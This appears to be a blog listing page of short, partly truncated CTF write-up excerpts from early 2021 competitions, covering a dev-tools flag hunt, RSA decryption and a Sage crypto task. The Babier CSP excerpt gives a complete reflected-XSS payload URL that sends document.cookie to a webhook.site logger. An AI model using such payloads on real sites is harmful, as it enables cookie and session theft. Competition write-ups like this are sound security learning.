This competition was on 30 - 31 January 2021. We placed 90th/804. Sanity Check The Sanity Check was slightly tricky. The challenge had to do something with the CTF website itself as the description said. So at the challenge URL, I went to the Network tab under Chrome Dev Tools and hit the record button. I reloaded the challenge to load the network requests and pressed ctrl-f to search for the flag format (justCTF) among the requests. The flag was in the first request, justCTF{something_h3re!}. Forgotten name

Notes about this CTF will be super brief since there's so many challenges and I don't have the patience to writeup all of them. If you really have trouble understanding though, I promise to work with you at luconfident#3198 on Discord as long as you contact me before May 2021 Crypto Problems We are given all the variables, n, p, q, e, and c in RSA. So decrypting the message is straightforward. sol.py cipher = bytes.fromhex("ae27eb3a148c3cf031079921ea3315cd27eb7d02882bf724169921eb3a469920e07d0b883bf63c018869a5090e8868e331078a68ec2e468c2bf13b1d9a20ea0208882de12e398c2df60211852deb021f823dda35079b2dda25099f35ab7d218227e17d0a982bee7d098368f13503cd27f135039f68e62f1f9d3cea7c")

Knock-Knock Above is the picture of the challenge on the site. Below are the files linked. knock.pcap link task.py import os import time

We played on 19 Feb 2021 and placed 66th / 466. Mordell Prime We are given mordell_primes.sage below and an output.txt that has the values of $N$ and $c$. from Crypto.Util.number import bytes_to_long from secrets import k, FLAG assert k < 2^128 assert FLAG.startswith(b'union{')

This competition was on 5 - 7 Feb 2021. We placed 157th / 1059. Babier CSP HTML ended up being executed directly on a webpage through a get parameter (name), but script tags weren't. After I added the fixed CSP nonce to the script tag, I was able to achieve a reflected XSS. Webhook.site is a site which allows the logging of the HTTP requests to itself, which I used to recover the secret cookie and ultimately the flag. The complete payload was https://babier-csp.dicec.tf/?name=%3Cscript%20nonce=%22LRGWAXOY98Es0zz0QOVmag==%22%20src=%22https://webhook.site/e5a244d7-94d3-40f8-899e-e268de336024?cookie=%22%2Bdocument.cookie%3E%3C/script%3E babymix